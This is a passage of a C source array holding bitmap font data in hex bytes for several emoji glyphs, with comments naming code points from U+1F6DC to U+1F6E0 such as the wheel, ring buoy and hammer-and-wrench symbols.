0x7f, 0xe3, 0xf9, 0xff, 0xff, 0xe3, 0xff, 0xff,
0xff, 0xff, 0xfc, 0xff, 0xff, 0xf1, 0xf0, 0x3e,
0x3, 0xe0, 0x3e, 0x7f, 0xff, 0xf8, 0xf8, 0x1f,
0x1, 0xe0, 0x1f, 0x3f, 0xff, 0xfc, 0x7c, 0xf,
0x80, 0xf0, 0xf, 0x9f, 0xff, 0xfe, 0x3e, 0x7,
0xc0, 0x78, 0x7, 0xcf, 0xff, 0xff, 0x1f, 0x3,
0xe0, 0x3c, 0x3, 0xe7, 0xff, 0xff, 0x8f, 0x81,
0xf0, 0x1e, 0x1, 0xf3, 0xff, 0xff, 0xc7, 0xc0,
0xf8, 0xf, 0x0, 0xf9, 0xff, 0xff, 0xe3, 0xe0,
0x7c, 0x7, 0x80, 0x7c, 0xff, 0xff, 0xf1, 0xf8,
0x7f, 0xf, 0xf0, 0x7e, 0x7f, 0xff, 0xf8, 0xfc,
0xbf, 0x97, 0xf9, 0x3f, 0x3f, 0xff, 0xfc, 0x7e,
0x5f, 0xcb, 0xfc, 0x9f, 0x9f, 0xff, 0xfe, 0x3f,
0x2f, 0xe5, 0xfe, 0x4f, 0xcf, 0xff, 0xff, 0x1f,
0x97, 0xf2, 0xff, 0x27, 0xe7, 0xff, 0xff, 0x8f,
0xcb, 0xf9, 0x7f, 0x93, 0xf3, 0xff, 0xff, 0xc7,
0xe5, 0xfc, 0xbf, 0xc9, 0xf9, 0xff, 0xff, 0xe3,
0xf2, 0xfe, 0x5f, 0xe4, 0xfc, 0xff, 0xff, 0xf1,
0xf9, 0x7f, 0x2f, 0xf2, 0x7e, 0x7f, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0x3f, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0x9f, 0xff, 0xfe,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xcf, 0xff, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfb,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F6DC "🛜" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x3f, 0xf8, 0x7,
0xff, 0xff, 0xff, 0xff, 0x81, 0xff, 0xff, 0xc0,
0xff, 0xff, 0xff, 0xff, 0x7, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xfe, 0xf, 0xff, 0xff, 0xff,
0x83, 0xff, 0xff, 0xfc, 0x1f, 0xff, 0xff, 0xff,
0xf0, 0x7f, 0xff, 0xfc, 0x3f, 0xff, 0xff, 0xff,
0xfe, 0x1f, 0xff, 0xfc, 0x3f, 0xff, 0xff, 0xff,
0xff, 0x87, 0xff, 0xfc, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xe1, 0xff, 0xff, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xfc, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1, 0xff,
0x0, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xf, 0xff,
0xf8, 0x3f, 0xff, 0xff, 0xff, 0xfc, 0x1f, 0xff,
0xff, 0x7, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff,
0xff, 0xe1, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff,
0xff, 0xf8, 0x7f, 0xff, 0xff, 0xff, 0x3f, 0xff,
0xff, 0xfe, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0x83, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x7f, 0xf0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xfe, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xff, 0xff, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6DD "🛝" */
0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x86, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x30, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0xe,
0xc, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x1, 0xc1,
0x80, 0x0, 0x0, 0x0, 0xe, 0x70, 0x3f, 0xb0,
0x0, 0x0, 0x0, 0x1, 0xc6, 0x7, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x30, 0xc0, 0xc7, 0xf8, 0x0,
0x0, 0x0, 0x6, 0x18, 0x38, 0xf, 0x80, 0x0,
0x0, 0x1, 0xe1, 0x87, 0x0, 0x78, 0x0, 0x0,
0x0, 0x3f, 0xbf, 0xfc, 0x3, 0x80, 0x0, 0x0,
0x7, 0xff, 0xff, 0xf0, 0x38, 0x0, 0x0, 0x0,
0xc3, 0xf8, 0x3f, 0x83, 0x0, 0x0, 0x0, 0x18,
0x1f, 0x80, 0x78, 0x70, 0x0, 0x0, 0x7, 0x3,
0x38, 0x3, 0x86, 0x0, 0x0, 0x0, 0xf8, 0x63,
0x80, 0x70, 0xe0, 0x0, 0x0, 0x1f, 0xfc, 0x38,
0x7, 0xc, 0x0, 0x0, 0x3, 0x7f, 0x83, 0x0,
0xe1, 0xc0, 0x0, 0x0, 0x60, 0xf8, 0x70, 0xc,
0x38, 0x0, 0x0, 0xc, 0x3, 0x86, 0x1, 0xc3,
0x0, 0x0, 0x3, 0x80, 0x30, 0xc0, 0x18, 0x70,
0x0, 0x0, 0x70, 0x7e, 0x1c, 0x3, 0x6, 0x0,
0x0, 0xc, 0xff, 0xe1, 0x80, 0x70, 0xc0, 0x0,
0x1, 0xff, 0xc, 0x30, 0x6, 0x1c, 0x0, 0x0,
0x3e, 0x1, 0xc7, 0x0, 0xc1, 0x80, 0x0, 0xe,
0x0, 0x38, 0x60, 0x1c, 0x30, 0x0, 0x1, 0xc0,
0xf, 0xc, 0x1, 0x87, 0x0, 0x0, 0x30, 0x1f,
0xf1, 0xc0, 0x38, 0x60, 0x0, 0x6, 0x3f, 0xfe,
0x18, 0x3, 0xe, 0x0, 0x0, 0xff, 0xc3, 0xc3,
0x0, 0x61, 0xc0, 0x0, 0x3f, 0x80, 0x4c, 0x30,
0xe, 0x18, 0x0, 0x7, 0x0, 0x19, 0x86, 0x0,
0xc3, 0x80, 0x0, 0xe0, 0x3, 0x30, 0xc0, 0x18,
0x30, 0x0, 0x18, 0x7, 0xe3, 0xc, 0x3, 0x86,
0x0, 0x3, 0xf, 0xfc, 0x61, 0x80, 0x30, 0xe0,
0x0, 0x7f, 0xf1, 0xc, 0x30, 0x6, 0xc, 0x0,
0x1f, 0xe0, 0x60, 0xc3, 0x0, 0x61, 0xc0, 0x3,
0xc0, 0xc, 0x18, 0x60, 0xc, 0x38, 0x0, 0x60,
0x1, 0x83, 0xe, 0x1, 0xc3, 0x80, 0xc, 0x0,
0x30, 0x30, 0xc0, 0x18, 0x38, 0x1, 0x80, 0x0,
0x6, 0x18, 0x3, 0x7, 0x80, 0x70, 0x0, 0x0,
0xe3, 0x80, 0x30, 0x3e, 0xe, 0x0, 0x0, 0xc,
0x30, 0x7, 0x3, 0xf9, 0x80, 0x0, 0x1, 0x86,
0x0, 0x70, 0x1f, 0xb0, 0x0, 0x0, 0x38, 0x60,
0x7, 0x0, 0x78, 0x0, 0x0, 0x3, 0xe, 0x0,
0x78, 0x3, 0x0, 0x0, 0x0, 0x70, 0xf0, 0x7,
0xc0, 0x60, 0x0, 0x0, 0x6, 0xf, 0xc0, 0x3f,
0xc, 0x0, 0x0, 0x0, 0xe0, 0x7e, 0x1, 0xfd,
0x80, 0x0, 0x0, 0x1e, 0x1, 0xe0, 0x7, 0xf0,
0x0, 0x0, 0x3, 0xe0, 0xc, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x7e, 0x1, 0x80, 0xf, 0xc0, 0x0,
0x0, 0xe, 0xf8, 0x30, 0x1f, 0xf8, 0x0, 0x0,
0x1, 0xc7, 0xe6, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x38, 0x3f, 0xff, 0xe3, 0x80, 0x0, 0x0, 0x7,
0x0, 0xff, 0xc0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x60, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xc,
0x0, 0x10, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0,
/* U+1F6DE "🛞" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x7f, 0xf0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x1, 0xff, 0xff, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x7, 0xe1, 0xc3, 0xf0, 0x1e,
0x0, 0x0, 0x3c, 0xf, 0x80, 0xe0, 0x3e, 0x7,
0x80, 0x0, 0x3c, 0xf, 0x0, 0x70, 0x7, 0x81,
0xe0, 0x0, 0x3c, 0x1f, 0x80, 0x38, 0x3, 0xf0,
0x70, 0x0, 0x1c, 0x1e, 0xe0, 0x1c, 0x3, 0xbc,
0x1c, 0x0, 0x1c, 0x1c, 0x30, 0xe, 0x3, 0x87,
0x7, 0x0, 0x1e, 0x1c, 0x1c, 0x7, 0x1, 0xc1,
0xc3, 0xc0, 0xe, 0x1c, 0x7, 0x3, 0x81, 0xc0,
0x70, 0xe0, 0xe, 0x1c, 0x3, 0x81, 0xc0, 0xe0,
0x1c, 0x38, 0xf, 0x1e, 0x0, 0xe0, 0xe0, 0xe0,
0xf, 0x1c, 0x7, 0xe, 0x0, 0x30, 0x70, 0x60,
0x3, 0x87, 0x3, 0x8f, 0x80, 0x1c, 0x38, 0x70,
0x3, 0xe3, 0x83, 0x87, 0xf0, 0x6, 0x1c, 0x30,
0x7, 0xf0, 0xe1, 0xc7, 0x7e, 0x3, 0x8e, 0x38,
0xf, 0x9c, 0x71, 0xc3, 0x8f, 0x80, 0xc7, 0x38,
0xf, 0x8e, 0x3c, 0xe3, 0x81, 0xf0, 0x73, 0x9c,
0x1f, 0x3, 0x8e, 0x71, 0xc0, 0x7e, 0x1d, 0xdc,
0x3f, 0x1, 0xc7, 0x38, 0xe0, 0xf, 0x86, 0xec,
0x3e, 0x0, 0xe3, 0xb8, 0x60, 0x1, 0xf3, 0xfe,
0x7c, 0x0, 0x70, 0xfc, 0x70, 0x0, 0x7e, 0xfe,
0xfc, 0x0, 0x1c, 0x7e, 0x38, 0x0, 0xf, 0xff,
0xf8, 0x0, 0xe, 0x3f, 0x1c, 0x0, 0x1, 0xf1,
0xf0, 0x0, 0x7, 0x1f, 0x8e, 0x0, 0x0, 0x70,
0x70, 0x0, 0x3, 0x8f, 0xc7, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xc7, 0xe3, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xe3, 0xf1, 0xc0, 0x0, 0xe,
0xe, 0x0, 0x0, 0x71, 0xf8, 0xe0, 0x0, 0x1f,
0x8f, 0xc0, 0x0, 0x38, 0xfc, 0x70, 0x0, 0x1f,
0xff, 0xf0, 0x0, 0x1c, 0x7e, 0x38, 0x0, 0x3f,
0x7f, 0x7e, 0x0, 0xe, 0x3f, 0xe, 0x0, 0x7e,
0x7f, 0xcf, 0xc0, 0xe, 0x3d, 0xc7, 0x0, 0xfe,
0x37, 0x63, 0xf8, 0x7, 0x1c, 0xe3, 0x80, 0xfc,
0x3b, 0xb8, 0x7e, 0x3, 0x8e, 0x71, 0xe1, 0xf8,
0x19, 0xce, 0xf, 0xc3, 0xc7, 0x38, 0x73, 0xf0,
0x1c, 0xe7, 0x1, 0xf9, 0xc7, 0x8e, 0x3b, 0xf0,
0x1c, 0x71, 0xc0, 0x7f, 0xe3, 0x87, 0xf, 0xe0,
0xc, 0x38, 0x60, 0xf, 0xe1, 0xc1, 0xc7, 0xc0,
0xe, 0x1c, 0x38, 0x1, 0xf1, 0xc0, 0xe1, 0xc0,
0x6, 0xe, 0xc, 0x0, 0x70, 0xe0, 0x78, 0xf0,
0x7, 0x7, 0x7, 0x0, 0x78, 0xe0, 0x1c, 0x38,
0x7, 0x3, 0x81, 0xc0, 0x38, 0x70, 0x7, 0xe,
0x3, 0x81, 0xc0, 0xe0, 0x38, 0x70, 0x3, 0xc3,
0x83, 0x80, 0xe0, 0x38, 0x38, 0x78, 0x0, 0xe0,
0xe1, 0xc0, 0x70, 0x1c, 0x38, 0x38, 0x0, 0x38,
0x3d, 0xc0, 0x38, 0x7, 0x78, 0x38, 0x0, 0x1e,
0xf, 0xc0, 0x1c, 0x1, 0xf8, 0x38, 0x0, 0x7,
0x81, 0xe0, 0xe, 0x0, 0xf0, 0x3c, 0x0, 0x1,
0xe0, 0x7c, 0x7, 0x1, 0xf0, 0x3c, 0x0, 0x0,
0x78, 0xf, 0xc3, 0x87, 0xe0, 0x3c, 0x0, 0x0,
0x1e, 0x1, 0xff, 0xff, 0xc0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0xf, 0xfe, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xfc, 0x0, 0x0, 0x0,
/* U+1F6DF "🛟" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xfe, 0x1, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc6, 0x0, 0x67, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x83, 0x0, 0x30, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x1, 0x80, 0x18, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0xc0, 0xc, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x60, 0x6, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x30, 0x3, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x18, 0x1, 0x80, 0x7,
0x80, 0x0, 0x3c, 0x0, 0xc, 0x0, 0xc0, 0x1,
0xe0, 0x0, 0x1c, 0x0, 0x6, 0x0, 0x60, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x3, 0x80, 0x70, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0xc0, 0x30, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x60, 0x18, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x30, 0xc, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x1c, 0xe, 0x0,
0x0, 0x38, 0x7, 0x0, 0x0, 0x7, 0xfe, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0xf, 0xff, 0x80,
0x0, 0x7, 0x3, 0x80, 0x0, 0x1f, 0x1, 0xf0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x1e, 0x0, 0x3c,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x3c, 0x0, 0x7,
0x80, 0x0, 0x71, 0xc0, 0x0, 0x3c, 0x0, 0x1,
0xc0, 0x0, 0x3c, 0xe0, 0x0, 0x1c, 0x0, 0x0,
0x70, 0x0, 0xe, 0x70, 0x0, 0x1c, 0x0, 0x0,
0x1c, 0x0, 0x7, 0x3f, 0xff, 0x9e, 0x0, 0x0,
0xe, 0x3f, 0xff, 0xbf, 0xff, 0xfe, 0x0, 0x0,
0x3, 0xff, 0xff, 0xff, 0x0, 0x3f, 0x0, 0x0,
0x1, 0xf8, 0x1, 0xfe, 0x0, 0x7, 0x0, 0x0,
0x0, 0x70, 0x0, 0x3f, 0x0, 0x3, 0x80, 0x0,
0x0, 0x38, 0x0, 0x1f, 0x80, 0x1, 0xc0, 0x0,
0x0, 0x1c, 0x0, 0xf, 0xc0, 0x0, 0xe0, 0x0,
0x0, 0xe, 0x0, 0x7, 0xe0, 0x0, 0x70, 0x0,
0x0, 0x7, 0x0, 0x3, 0xf0, 0x0, 0x38, 0x0,
0x0, 0x3, 0x80, 0x1, 0xf8, 0xff, 0xfc, 0x0,
0x0, 0x1, 0xff, 0xf8, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xe0, 0x3, 0x80,
0x0, 0x0, 0xe0, 0x3, 0xff, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x70, 0x0, 0x1d, 0xc0, 0x0, 0xf0,
0x0, 0x0, 0x70, 0x0, 0x1c, 0xe0, 0x0, 0x38,
0x0, 0x0, 0x38, 0x0, 0xe, 0x70, 0x0, 0xe,
0x0, 0x0, 0x38, 0x0, 0x7, 0x3c, 0x0, 0x3,
0x80, 0x0, 0x38, 0x0, 0x7, 0x8e, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x3, 0x87, 0x0, 0x0,
0x3c, 0x0, 0x78, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0xf, 0x80, 0xf8, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x3f, 0xf0, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x38, 0x1c, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x18, 0x6, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0xc, 0x3, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x6, 0x1, 0x80, 0x0, 0x38, 0x0, 0x38,
0x0, 0x7, 0x0, 0xe0, 0x0, 0x38, 0x0, 0xe,
0x0, 0x3, 0x0, 0x30, 0x0, 0x38, 0x0, 0x7,
0x80, 0x1, 0x80, 0x18, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0xc0, 0xc, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x60, 0x6, 0x0, 0x3c, 0x0, 0x0,
0xe, 0x0, 0x30, 0x3, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x18, 0x1, 0x80, 0x78, 0x0, 0x0,
0x0, 0xf8, 0xc, 0x0, 0xc0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x6, 0x0, 0x61, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe3, 0x0, 0x33, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xc0, 0x3f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0,
/* U+1F6E0 "🛠" */
0x0, 0x0, 0x0, 0x3, 0xff, 0x0, 0x7, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0x80, 0x7f,
0xfc, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x7, 0x1,
0xf0, 0x3c, 0x0, 0x0, 0x0, 0xf, 0x0, 0x1e,
0xf, 0x0, 0x38, 0x0, 0x0, 0x0, 0x7c, 0x3,
0xfc, 0x3c, 0x1, 0xf0, 0x0, 0x0, 0x1, 0xe0,
0x3f, 0xe0, 0x70, 0xf, 0x80, 0x0, 0x0, 0x7,
0x81, 0xfe, 0x1, 0xc0, 0x3e, 0x0, 0x0, 0x0,
0x1e, 0x7, 0xe0, 0x7, 0x81, 0xf0, 0x0, 0x0,
0x0, 0xf8, 0x1f, 0x0, 0xe, 0x3, 0xc0, 0x0,
0x0, 0x3, 0xc0, 0x38, 0x0, 0x1c, 0x7, 0x0,
0x0, 0x0, 0xf, 0x0, 0x70, 0x0, 0x70, 0xe,
0x0, 0x10, 0x0, 0x3c, 0x0, 0x70, 0x0, 0xe0,
0x1c, 0x0, 0x70, 0x0, 0xf0, 0x0, 0xf0, 0x1,
0xc0, 0x3c, 0x3, 0xe0, 0x1, 0xc0, 0x0, 0x70,
0x3, 0x80, 0x38, 0x1f, 0xc0, 0x3, 0x80, 0x0,
0x60, 0x7, 0x0, 0x78, 0x7f, 0x80, 0x7, 0x0,
0x1, 0xc0, 0xe, 0x0, 0x7b, 0xe7, 0x0, 0x6,
0x0, 0x3, 0x80, 0x1c, 0x0, 0x7f, 0xc, 0x0,
0xe, 0x0, 0x1e, 0x0, 0x1c, 0x0, 0x38, 0x18,
0xf, 0x38, 0x0, 0x7c, 0x0, 0x38, 0x0, 0x0,
0x70, 0x3f, 0xe0, 0x1, 0xfc, 0x0, 0x78, 0x0,
0x0, 0xc1, 0xe3, 0x80, 0x7, 0x9c, 0x1, 0xe0,
0x0, 0x3, 0x87, 0x80, 0x0, 0x1e, 0x1c, 0xf,
0x80, 0x0, 0xe, 0x1e, 0x0, 0x3e, 0xf8, 0x1c,
0x3c, 0x0, 0x0, 0x38, 0x70, 0x0, 0xff, 0xe0,
0x1c, 0xf0, 0x0, 0x0, 0xe0, 0xe0, 0x3, 0xff,
0xe0, 0x1f, 0xc0, 0x1c, 0x7, 0x81, 0xc0, 0x7,
0x1c, 0xe0, 0x1f, 0x0, 0x7f, 0xfe, 0x1, 0xc0,
0xe, 0x0, 0xe0, 0x3c, 0x0, 0xdf, 0xe0, 0x3,
0x80, 0xc, 0x0, 0xe0, 0xf0, 0x3, 0x0, 0x0,
0x3, 0x80, 0x18, 0x0, 0xe3, 0xc0, 0xe, 0x0,
0x0, 0x7, 0x80, 0x30, 0x1, 0xef, 0x0, 0x38,
0x0, 0x0, 0x7, 0x80, 0xe0, 0x1, 0xfc, 0x0,
0xe0, 0x0, 0x0, 0x7, 0x83, 0x80, 0x1, 0xf0,
0x3, 0x80, 0x0, 0x0, 0x7, 0x9e, 0x0, 0x7,
0xc0, 0xe, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x0,
0x1e, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x78, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x1, 0x9e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x80, 0x7, 0x1e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x1c, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x70, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x1, 0xc0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x7,
0x80, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x1f, 0x80, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x33, 0x80, 0x3c, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0xc3, 0x80, 0x3c, 0x0, 0x0, 0x0,
0xf, 0x0, 0x3, 0x3, 0x80, 0x3c, 0x0, 0x0,
0x0, 0x3c, 0x0, 0xe, 0x7, 0x0, 0x3c, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x38, 0x7, 0x0, 0x3c,
0x0, 0x0, 0x7, 0xc0, 0x0, 0xe0, 0x7, 0x0,
0x3c, 0x0, 0x0, 0x1f, 0x0, 0x3, 0x80, 0x7,
0x0, 0x3c, 0x0, 0x0, 0x7c, 0x0, 0xe, 0x0,
0x7, 0x0, 0x3c, 0x0, 0x1, 0xf0, 0x0, 0x18,
0x0, 0x6, 0x0, 0x3c, 0x0, 0x3, 0xc0, 0x0,
0x60, 0x0, 0xe, 0x0, 0x3c, 0x0, 0xf, 0x0,
0x1, 0x80, 0x0, 0xe, 0x0, 0x3c, 0x0, 0x3c,
0x70, 0x7, 0x0, 0x0, 0xe, 0x0, 0x7c, 0x0,
0x71, 0xf0, 0x1c, 0x0, 0x0, 0xe, 0x0, 0x78,
0x0, 0xe3, 0xe0, 0x70, 0x0, 0x0, 0xe, 0x0,
0x78, 0x1, 0xc7, 0xc1, 0xc0, 0x0, 0x0, 0xc,
0x0, 0x70, 0x3, 0x87, 0x3, 0x0, 0x0, 0x0,
0x1c, 0x0, 0xe0, 0x7, 0x0, 0xc, 0x0, 0x0,
0x0, 0x1c, 0x3, 0xc0, 0x7, 0x0, 0x30, 0x0,
